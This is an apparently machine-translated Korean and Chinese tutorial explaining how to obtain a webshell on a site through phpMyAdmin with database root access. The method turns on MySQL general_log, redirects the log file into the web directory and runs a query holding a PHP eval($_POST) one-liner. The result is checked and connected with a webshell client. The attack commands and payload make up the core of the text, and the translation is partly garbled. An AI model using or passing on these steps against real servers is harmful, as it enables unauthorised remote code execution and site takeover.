phpmyadmin의 새로운 자세 getshell 정보

아래 phpmyadmin 사용법 튜토리얼 칼럼에서 새로운 phpmyadmin 자세 getshell을 소개하겠습니다. 필요한 친구들에게 도움이 되길 바랍니다!

Baidu 백과사전: phpMyAdmin은 PHP를 기반으로 하고 웹 사이트 호스트에서 웹 기반 모드로 구조화된 MySQL 데이터베이스 관리 도구로, 관리자가 웹 인터페이스를 사용하여 MySQL 데이터베이스를 관리할 수 있습니다. 이 웹 인터페이스는 특히 대량의 데이터를 가져오고 내보낼 때 복잡한 SQL 구문을 간단한 방법으로 입력하는 더 나은 방법이 될 수 있습니다. 가장 큰 장점 중 하나는 phpMyAdmin이 다른 PHP 프로그램과 마찬가지로 웹 서버에서 실행되지만 이러한 프로그램에서 생성된 HTML 페이지를 어디서나 사용할 수 있다는 것, 즉 MySQL 데이터베이스를 원격으로 관리하고 쉽게 생성, 수정, 삭제할 수 있다는 것입니다. 데이터베이스 및 데이터 테이블. 또한 phpMyAdmin을 사용하면 일반적으로 사용되는 PHP 구문을 생성하여 웹 페이지를 작성할 때 필요한 SQL 구문의 정확성을 높일 수 있습니다.

일반인 입장에서 말하면 웹페이지에서 데이터베이스를 편리하게 운영하는 기능입니다.

사이트의 phpmyadmin 페이지를 받으면 다음으로 해야 할 일은 getshell입니다.

셸을 작성하여 권한을 높일 수 있으며 다음 조건을 충족해야 합니다.

1. 데이터베이스 루트 권한

2. 웹사이트의 물리적 경로를 알아야 합니다.

3. 데이터베이스에 쓰기 권한이 있습니다. select '' INTO OUTFILE '웹사이트 물리적 경로' 쉘에 쓰기

이 기사에서는 주로 조건 3이 충족되지 않을 때 성공적인 getshell에 대해 설명합니다.

사용 조건 :

MySQL 5.0+

MySQL 5.0+

버전에서는 자동으로 로그 파일이 생성되므로 서비스 실행 중에 전역 변수를 수정하여 파일 위치를 변경할 수 있으나, 로그가 저장되는 디렉터리를 설정해야 합니다. 생성되었습니다. 읽기 및 쓰기 권한이 있습니다.

(Linux 환경은 더 까다로울 수 있습니다. 사이트 디렉토리는 한 명의 사용자이고 MySQL은 또 다른 사용자이고 권한 제어는 더 엄격하며 주로 권한이 올바르게 구성되었는지 여부에 따라 다릅니다.)

먼저 사이트에 쓰기가 있는지 테스트합니다. 허가

SQL 문 실행 SHOW VARIABLES LIKE 'secure_file_priv'

sql 문 SHOW VARIABLES LIKE 'secure_file_priv' 쿼리를 수행하여 secure_file_priv

secure-file-priv 기능을 찾으세요

secure-file-priv 매개변수는 LOAD DATA를 제한하는 데 사용되며 SELECT ... OUTFILE 및 LOAD_FILE()이 지정된 디렉터리로 전달됩니다.

secure_file_priv 값이 null이면 mysql이 import|export를 허용하지 않도록 제한된다는 의미입니다.
secure_file_priv 값이 /tmp/이면 mysql 가져오기/내보내기가 다음으로 제한됩니다. /tmp/ 디렉터리에서만 발생합니다
secure_file_priv 값에 특정 값이 없으면 mysql 가져오기 및 내보내기에 제한이 없음을 의미합니다.
mysql-에서 해당 속성을 설정할 수 있습니다. ini 파일

테스트 후 쓰기 권한이 없습니다

그럼 MySQL 전역 변수 2개(

general_log, General_log 파일

)를 소개하겠습니다.

general log는 로그 저장을 의미합니다. 상태에는 두 가지 값(ON/OFF)이 있습니다. ON은 열림을 의미하고 OFF는 닫힘을 의미합니다.
일반 로그 파일은 로그가 저장되는 경로를 말합니다.
mysql 로그에 Trojan 문장을 작성한 다음 mysql 로그 경로를 웹사이트 디렉터리로 이동하여 getshell을 구현할 수 있습니다

SQL 문 SHOW VARIABLES LIKE 'general_log%'를 실행하여 퍼지 쿼리를 수행합니다

로그는 기본적으로 닫혀 있습니다

SQL 문을 실행합니다

set global general_log = "ON";     #开启日志
SET global general_log_file='网站下物理路径';  #更换日志路径

성공적으로 생성되었습니다

然后执行特殊的查询语句

select  &#39;<?php eval($_POST[aaa]);?>&#39;

我们进入112233.php进行验证，成功写入shell

 最后进行菜刀连接，获得站点webshell

 

위 내용은 phpmyadmin의 새로운 자세 getshell 정보의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!